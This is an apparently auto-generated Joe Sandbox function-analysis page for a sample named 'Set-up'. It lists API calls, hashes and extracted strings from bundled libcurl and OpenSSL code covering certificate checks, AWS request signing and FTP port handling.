Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: d21020c853d065cf4a42e5072562d04012d525f5612080d723f1b09efd64dc99
Instruction ID: e3040332019375ace1a9983a2d77956795377094b01fec727de24350500f9e8c
Opcode Fuzzy Hash: d21020c853d065cf4a42e5072562d04012d525f5612080d723f1b09efd64dc99
Instruction Fuzzy Hash: 61C012F1108200EFC7084B24E849A6F77E9EB48255F01441CB046C2150DF749450CF16

Function 000D9270 Relevance: 1.4, APIs: 1, Instructions: 165COMMON

Download Yara Rule

APIs

Part of subcall function 000DA440: GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 000DA499
Part of subcall function 000DA440: GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 000DA4FB
Part of subcall function 000DA440: RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 000DAA19

Part of subcall function 000D9B60: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(LOCALDOMAIN,00000000,00000000,?,0000000F,?,000D92A4,?,?,?,?,?,?,?,?,00000000), ref: 000D9B6E
Part of subcall function 000D9B60: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(RES_OPTIONS,?,?,?,?,?,?,?,?,00000000,?,0000000F,000D4860,00000000), ref: 000D9C24

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0000000F), ref: 000D93C3

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: AdaptersAddressesgetenv$Openmemcpy
String ID:
API String ID: 1905038125-0
Opcode ID: ccfe7d4f088f17ef5b3554a3026b6bb26ef1623b662225f9694dcc43e9e96c42
Instruction ID: 45ab42b996de21d1d223ae2627f084abc793b905cb67f3147bd4c727aae40954
Opcode Fuzzy Hash: ccfe7d4f088f17ef5b3554a3026b6bb26ef1623b662225f9694dcc43e9e96c42
Instruction Fuzzy Hash: 61510671904342ABD750CF25EC85B6BBBE4BF84304F08052EF84997762E731E964DBA2

Function 004FB080 Relevance: 1.3, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,004F6470,?,?,?,?,?,004F5DF1), ref: 004FB091

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 489b09de03469392b0205c4527003731dc12c2b5f9ef50005da7f51bec6c7b57
Instruction ID: 90464b1d07458de4817a957b7406a84d5c90a340c69654af160f805831c58053
Opcode Fuzzy Hash: 489b09de03469392b0205c4527003731dc12c2b5f9ef50005da7f51bec6c7b57
Instruction Fuzzy Hash: 90D0A771D043048BC7007F54C8C141B33D8FAA6318F80065DDD841B302D739551487C3

Function 001FCBC0 Relevance: 1.3, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,001D7254,?,crypto/err/err_local.h,00000039,00000000,?,00040000,?,001D40BB,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001FCBD2

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 9b2d529b623923ec31073cfcd58f29b52b6b121d955570106afc08c25ca55059
Instruction ID: afe384f00caecfb54b6223dffd6588fa4a6d544dc2b8c8c932224c460cc63abd
Opcode Fuzzy Hash: 9b2d529b623923ec31073cfcd58f29b52b6b121d955570106afc08c25ca55059
Instruction Fuzzy Hash: 9DB092BA80540CDBE6169704BA8383A7351FAA0B44B940820F705D00B1DB219C18B982

Non-executed Functions

Function 000962E0 Relevance: 123.9, APIs: 9, Strings: 72, Instructions: 2363stringCOMMON

Download Yara Rule

APIs

strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,Unknown error), ref: 00096E74
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,000007FF), ref: 00096F8A
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,000007FF), ref: 00097184
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00097263
memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 000975B8

Part of subcall function 001EF870: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000800), ref: 001EF8AE

Strings

ipv4 address, xrefs: 00097AD2
hostname, xrefs: 00097AE1, 00097B10, 00097B29
subjectAltName: host "%s" matched cert's IP address!, xrefs: 00097607
Error getting peer certificate, xrefs: 00098153
Error computing OCSP ID, xrefs: 0009806E
Signature Algorithm, xrefs: 000966A6
SSL: unable to obtain common name from peer certificate, xrefs: 00097F29
issuer: %s, xrefs: 000971CE
%02x, xrefs: 000965C8
: , xrefs: 000978FE
ipv6 address, xrefs: 00097AD7
subject: %s, xrefs: 00097021
BIO_new return NULL, OpenSSL error %s, xrefs: 00096E7D, 00097E52
SSL certificate verify result: %s (%ld), continuing anyway., xrefs: 00097D38
SSL: could not get peer certificate, xrefs: 00096FD5
SSL: Unable to read issuer cert (%s), xrefs: 00097995
SSL certificate revocation reason: %s (%d), xrefs: 000983F1
pqg, xrefs: 00096A29, 00096A7E, 00096B13, 00096B6C
Subject, xrefs: 0009648C
SSL certificate verify result: %s (%ld), xrefs: 00097FB0
Public Key Algorithm, xrefs: 00096725
Cert, xrefs: 00096D7F
subjectAltName: host "%s" matched cert's "%s", xrefs: 000980EC
SSL: Unable to open issuer cert (%s), xrefs: 00097232
vtls/openssl.c, xrefs: 00097BD2, 00097F54, 00098217, 00098278, 00098293
No error, xrefs: 00096E65, 0009793C
%02x:, xrefs: 00096CE8
OpenSSL, xrefs: 00096DFC, 000978D3
Certificate level %d: Public key type %s%s (%d/%d Bits/secBits), signed using %s, xrefs: 0009736B
Serial Number, xrefs: 000965F1
subjectAltName does not match %s %s, xrefs: 00097B11
Could not find certificate ID in OCSP response, xrefs: 0009840A
unexpected ssl peer type: %d, xrefs: 00097621
Proxy, xrefs: 00096F01
SSL: illegal cert name field, xrefs: 00098078
Server, xrefs: 00096F06, 00096F10
BIO_new_mem_buf NULL, OpenSSL error %s, xrefs: 00097954
start date: %.*s, xrefs: 0009707C
%lx, xrefs: 00096524
dsa, xrefs: 00096B71, 00096B90, 00096BAE, 00096BC9
%s/%s, xrefs: 00096E01, 000978D8
OCSP response has expired, xrefs: 00098414
SSL: no alternative certificate subject name matches target %s '%s', xrefs: 00097B2A
[NONE], xrefs: 00097011
No OCSP response received, xrefs: 000979D8
Could not get peer certificate chain, xrefs: 00098122
expire date: %.*s, xrefs: 000970E2
Unable to load public key, xrefs: 000969DB
SSL certificate issuer check ok (%s), xrefs: 00097CAF
Invalid OCSP response, xrefs: 00097D4B, 000980B1
SSL: public key does not match pinned public key, xrefs: 000982B2
pub_key, xrefs: 00096AD6, 00096BC4
SSL: certificate subject name '%s' does not match target hostname '%s', xrefs: 00098133
%s certificate:, xrefs: 00096F11
Expire date, xrefs: 000968EE
Version, xrefs: 0009654F
Issuer, xrefs: 000964EF
Signature, xrefs: 00096D1F
<, xrefs: 00097F90
RSA Public Key, xrefs: 00096C31
common name: %s (matched), xrefs: 00097F17
Start date, xrefs: 00096887
Invalid OCSP response status: %s (%d), xrefs: 000977F8
/%s, xrefs: 00097489, 00097741
Unknown error, xrefs: 00096E6A, 00096E72, 00097941, 00097949
Remove session ID again from cache, xrefs: 00097DD4
SSL certificate verify ok., xrefs: 0009809E
rsa, xrefs: 00096C56, 00096C75
SSL: Certificate issuer check failed (%s), xrefs: 00097867
SSL certificate status: %s (%d), xrefs: 000983B6
OCSP response verification failed, xrefs: 0009814C
SSL: could not get X509-issuer name, xrefs: 000972C2

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: memcpy$memcmpmemsetstrcpystrlen
String ID: Unable to load public key$ Certificate level %d: Public key type %s%s (%d/%d Bits/secBits), signed using %s$ SSL certificate issuer check ok (%s)$ SSL certificate verify ok.$ SSL certificate verify result: %s (%ld), continuing anyway.$ common name: %s (matched)$ expire date: %.*s$ issuer: %s$ start date: %.*s$ subject: %s$ subjectAltName does not match %s %s$ subjectAltName: host "%s" matched cert's "%s"$ subjectAltName: host "%s" matched cert's IP address!$%02x$%02x:$%lx$%s certificate:$%s/%s$/%s$: $<$BIO_new return NULL, OpenSSL error %s$BIO_new_mem_buf NULL, OpenSSL error %s$Cert$Could not find certificate ID in OCSP response$Could not get peer certificate chain$Error computing OCSP ID$Error getting peer certificate$Expire date$Invalid OCSP response$Invalid OCSP response status: %s (%d)$Issuer$No OCSP response received$No error$OCSP response has expired$OCSP response verification failed$OpenSSL$Proxy$Public Key Algorithm$RSA Public Key$Remove session ID again from cache$SSL certificate revocation reason: %s (%d)$SSL certificate status: %s (%d)$SSL certificate verify result: %s (%ld)$SSL: Certificate issuer check failed (%s)$SSL: Unable to open issuer cert (%s)$SSL: Unable to read issuer cert (%s)$SSL: certificate subject name '%s' does not match target hostname '%s'$SSL: could not get X509-issuer name$SSL: could not get peer certificate$SSL: illegal cert name field$SSL: no alternative certificate subject name matches target %s '%s'$SSL: public key does not match pinned public key$SSL: unable to obtain common name from peer certificate$Serial Number$Server$Signature$Signature Algorithm$Start date$Subject$Unknown error$Version$[NONE]$dsa$hostname$ipv4 address$ipv6 address$pqg$pub_key$rsa$unexpected ssl peer type: %d$vtls/openssl.c
API String ID: 838718518-248801092
Opcode ID: 95d9e235aa9d87e41301cac5184a55d194c516b52d37cd712232f5c952b3b819
Instruction ID: ae2501a8db632f6d6feaec4b6f6316e9627030fa099092f68fcc55f9f9e972f1
Opcode Fuzzy Hash: 95d9e235aa9d87e41301cac5184a55d194c516b52d37cd712232f5c952b3b819
Instruction Fuzzy Hash: 6A03E7B69183406BEB20AB10AC42B7F76D8AF96708F08483CFD4D56283F775A954D793

Function 0007E6A0 Relevance: 120.2, APIs: 39, Strings: 29, Instructions: 1230stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003A8870: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 003A88AA

strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 0007E8EB
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002E), ref: 0007E907
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0007E96C
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000003A), ref: 0007EA3C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 0007EA5F
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 0007EC0A
strftime.API-MS-WIN-CRT-TIME-L1-1-0(?,00000011,%Y%m%dT%H%M%SZ,?), ref: 0007ED17
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0007ED37
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0007EE03
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 0007EE24
strcspn.API-MS-WIN-CRT-STRING-L1-1-0(?,005AAED1), ref: 0007EE32

Strings

%s4%s, xrefs: 0007F5D5
%s4_request, xrefs: 0007F4AD
;:, xrefs: 0007F1EA
aws, xrefs: 0007E9D4
%s/%s/%s/%s, xrefs: 0007F4DB
aws-sigv4: region missing in parameters and hostname, xrefs: 0007F0E4
%s4-HMAC-SHA256%s%s%s, xrefs: 0007F59C
aws-sigv4: service too long in hostname, xrefs: 0007E91E
aws:amz, xrefs: 0007E855, 0007E882
x-%s-date:%s, xrefs: 0007ED8F
aws_sigv4: picked service %s from host, xrefs: 0007E9A4
+, xrefs: 0007E8D1
aws-sigv4: service missing in parameters and hostname, xrefs: 0007E92C
aws-sigv4: region too long in hostname, xrefs: 0007EB8A
x-%s-content-sha256, xrefs: 0007EA1A
aws_sigv4: picked region %s from host, xrefs: 0007F14C
X-%s-Date, xrefs: 0007ED6A
Date, xrefs: 0007F04F
Authorization, xrefs: 0007E7E2
Authorization: %s4-HMAC-SHA256 Credential=%s/%s, SignedHeaders=%s, Signature=%s%s%s, xrefs: 0007F758
Host, xrefs: 0007EDA1
x-%s-content-sha256: %s, xrefs: 0007EBDF
first aws-sigv4 provider cannot be empty, xrefs: 0007E8BD
%s: %s, xrefs: 0007F1A4
http_aws_sigv4.c, xrefs: 0007EC81, 0007EC94, 0007ECA7, 0007ECBA, 0007ECCD, 0007ECE3, 0007EFD2, 0007F014, 0007F773
%64[^:]:%64[^:]:%64[^:]:%64s, xrefs: 0007E87D
%s%s%s%s%s%.*s, xrefs: 0007F47A
host:%s, xrefs: 0007EE68
%Y%m%dT%H%M%SZ, xrefs: 0007ED0F

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strlen$strchrstrcpy$__stdio_common_vsscanf_time64memcpystrcspnstrftime
String ID: ;:$%64[^:]:%64[^:]:%64[^:]:%64s$%Y%m%dT%H%M%SZ$%s%s%s%s%s%.*s$%s/%s/%s/%s$%s4%s$%s4-HMAC-SHA256%s%s%s$%s4_request$%s: %s$+$Authorization$Authorization: %s4-HMAC-SHA256 Credential=%s/%s, SignedHeaders=%s, Signature=%s%s%s$Date$Host$X-%s-Date$aws$aws-sigv4: region missing in parameters and hostname$aws-sigv4: region too long in hostname$aws-sigv4: service missing in parameters and hostname$aws-sigv4: service too long in hostname$aws:amz$aws_sigv4: picked region %s from host$aws_sigv4: picked service %s from host$first aws-sigv4 provider cannot be empty$host:%s$http_aws_sigv4.c$x-%s-content-sha256$x-%s-content-sha256: %s$x-%s-date:%s
API String ID: 3777502179-657784405
Opcode ID: d10c5957674038edd7c1381f25cbba0c8299afec7a551ae14f621306f7c3815a
Instruction ID: 49e919862ad16e003acee0496ad33c4131699c7ff4b63df0f64ccd7d27045770
Opcode Fuzzy Hash: d10c5957674038edd7c1381f25cbba0c8299afec7a551ae14f621306f7c3815a
Instruction Fuzzy Hash: 7792C6B1D08381ABE7319B20DC45BBF77D8AB95304F04882DF98D96242FB75A944C7A7

Function 003AE050 Relevance: 119.3, APIs: 64, Strings: 3, Instructions: 2082COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 003AE0B3
localeconv.MSVCRT ref: 003AE0BE
isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 003AE149
isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 003AE179
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 003AE1D8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 003AE1FA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 003AE20F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 003AF886

Strings

nil), xrefs: 003B041D
, xrefs: 003AFED0
d, xrefs: 003AEAAF

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: free$isspacelocaleconv$_errno
String ID: $d$nil)
API String ID: 577766270-394766432
Opcode ID: bf03f6a68b4dfad5224d2a5048699ab8af2a4461cbabbcc595c5bbfd2236b620
Instruction ID: 4bf6fdf3f1b06113b0cf425036d956dd225193a23f4d215d01f2f41e78970dda
Opcode Fuzzy Hash: bf03f6a68b4dfad5224d2a5048699ab8af2a4461cbabbcc595c5bbfd2236b620
Instruction Fuzzy Hash: 5F1369706083418FD726DF28C08466BBBE1FF8A358F254A2DE9959B361D771EC45CB82

Function 0006E520 Relevance: 88.3, APIs: 25, Strings: 25, Instructions: 766COMMON

Download Yara Rule

Strings

[%s] ftp_state_use_port(), opened socket, xrefs: 0006EAE2
Failure sending PORT command: %s, xrefs: 0006EF05
bind(port=%hu) failed: %s, xrefs: 0006ED00
[%s] ftp_state_use_port(), socket bound to port %d, xrefs: 0006ED32
%s |%d|%s|%hu|, xrefs: 0006EF47
PRET %s, xrefs: 0006E5FF
PORT, xrefs: 0006EED7
PRET RETR %s, xrefs: 0006E5D9
LIST, xrefs: 0006E5F1
bind(port=%hu) on non-local address failed: %s, xrefs: 0006EBC6
PRET STOR %s, xrefs: 0006E607
[%s] ftp_state_use_port(), listening on %d, xrefs: 0006ED9D
socket failure: %s, xrefs: 0006E9D5
EPRT, xrefs: 0006EF42
%s %s, xrefs: 0006EEDC
getsockname() failed: %s, xrefs: 0006E905, 0006EC1B
bind() failed, we ran out of ports, xrefs: 0006EB15
???, xrefs: 0006EADC, 0006EAE1, 0006ED2B, 0006ED31, 0006ED96, 0006ED9C
failed to resolve the address provided to PORT: %s, xrefs: 0006E9DD
STOP, xrefs: 0006C3C6, 0006EA55
NLST, xrefs: 0006E5F6, 0006E5FE
,%d,%d, xrefs: 0006EEBF
PRET, xrefs: 0006E656
Failure sending EPRT command: %s, xrefs: 0006EF6C
[%s] -> [%s], xrefs: 0006C2D2, 0006C3D2, 0006E4FF, 0006E56E, 0006E662, 0006EA61

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID:
String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$???$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$LIST$NLST$PORT$PRET$PRET %s$PRET RETR %s$PRET STOR %s$STOP$[%s] -> [%s]$[%s] ftp_state_use_port(), listening on %d$[%s] ftp_state_use_port(), opened socket$[%s] ftp_state_use_port(), socket bound to port %d$bind() failed, we ran out of ports$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
API String ID: 0-1569884781
Opcode ID: a57d7f07c5ae77f24f656430c3f6c93d13b8cac8e6ae6d659d9b8b5cba873705
Instruction ID: 7b75d937ffbf364bf06c79c148b2a8df5f43266d67219ca96bf189710d961263
Opcode Fuzzy Hash: a57d7f07c5ae77f24f656430c3f6c93d13b8cac8e6ae6d659d9b8b5cba873705
Instruction Fuzzy Hash: 67421379608380AFD760DB24DC45BAB7BEAEF94704F184829F885C7292E730DD45C7A2

Function 0002E620 Relevance: 62.3, APIs: 29, Strings: 6, Instructions: 1028COMMON

Download Yara Rule

APIs

fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?), ref: 0002E6F1

Strings

(nil), xrefs: 0002ECCD
.%d, xrefs: 0002EE0E
0, xrefs: 0002EBCA
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 0002E9AA, 0002EAEB
-, xrefs: 0002EC74
0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 0002E68E, 0002E9AF, 0002EAF0

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

